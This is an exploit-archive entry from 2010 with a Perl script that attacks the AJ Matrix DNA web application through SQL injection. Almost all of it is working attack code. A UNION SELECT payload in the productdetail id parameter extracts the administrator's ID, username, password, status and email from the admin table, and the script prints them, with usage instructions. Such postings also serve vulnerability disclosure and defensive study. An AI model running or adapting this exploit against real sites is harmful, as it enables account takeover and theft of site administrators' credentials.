ExploitFixes
AJ Matrix DNA SQL INJECTION 2010-12-09 18:15:09

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: AJ Matrix DNA
#| -Site: http://www.ajsquare.com/ajhome.php
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , Out0fBound
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--
#|
#| --------------------------------------
#| -AJ Matrix DNA
#| -Sql Injection
#| -by Br0ly
#| --------------------------------------
#|
#|
#|
#|
#| >D, And sorry for my bad english ;/
#|
#|

use IO::Socket::INET;
use LWP::UserAgent;

my $host = $ARGV[0];
my $sql_path = "/index.php?do=productdetail&id=";


if (@ARGV < 1) {
&banner();
&help("-1");
}

elsif(cheek($host) == 1) {
&banner();
&xploit($host,$sql_path);
}

else {
&banner();
help("-2");
}

sub xploit() {

my $host = $_[0];
my $sql_path = $_[1];

print "[+] Getting the id,login,pass,status of the admin.\n";

my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--";
my $sql_get = get_url($sql_atk);
my $connect = tag($sql_get);

if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) {
print "[+] ID = $1\n";
print "[+] User = $2\n";
print "[+] Pass = $3\n";
print "[+] Status = $4\n";
print "[+] Email = $5\n";
exit(0);
}
else {
print "[-] Exploit, Fail\n";
exit(0);

}
}

sub get_url() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}

sub help() {

my $error = $_[0];
if ($error == -1) {
print "\n[-] Error, missed some arguments !\n\n";
}

elsif ($error == -2) {

print "\n[-] Error, Bad arguments !\n";
}

print "[*] Usage : perl $0 http://localhost/ajmatrixdna/\n\n";
print " Ex: perl $0 http://localhost/ajmatrixdna/\n\n";
exit(0);
}

sub banner {
print "\n".
" --------------------------------------\n".
" -AJ Matrix DNA \n".
" -Sql Injection \n".
" -by Br0ly \n".
" --------------------------------------\n\n";
}